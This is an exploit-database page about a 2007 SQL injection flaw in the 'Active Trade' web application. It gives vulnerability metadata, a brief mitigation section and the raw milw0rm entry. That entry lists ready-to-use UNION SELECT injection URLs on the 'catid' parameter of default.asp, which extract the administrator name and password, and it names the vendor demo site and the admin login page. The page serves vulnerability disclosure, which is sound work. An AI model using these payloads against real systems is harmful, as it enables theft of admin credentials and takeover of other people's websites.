header-logo
Suggest Exploit
vendor:
Active Trade
by:
CyberGhost
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Active Trade
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Active Trade Remote SQL Injection Vulnerability

This vulnerability allows an attacker to execute SQL queries in the application's database. By manipulating the 'catid' parameter in the URLs mentioned, an attacker can retrieve sensitive information from the database, such as admin usernames and passwords.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterization techniques to prevent SQL injection attacks. Additionally, the latest version of the software should be used, as it may contain patches for this vulnerability.
Source

Exploit-DB raw data:

#Title  : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32

#Vuln.

#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR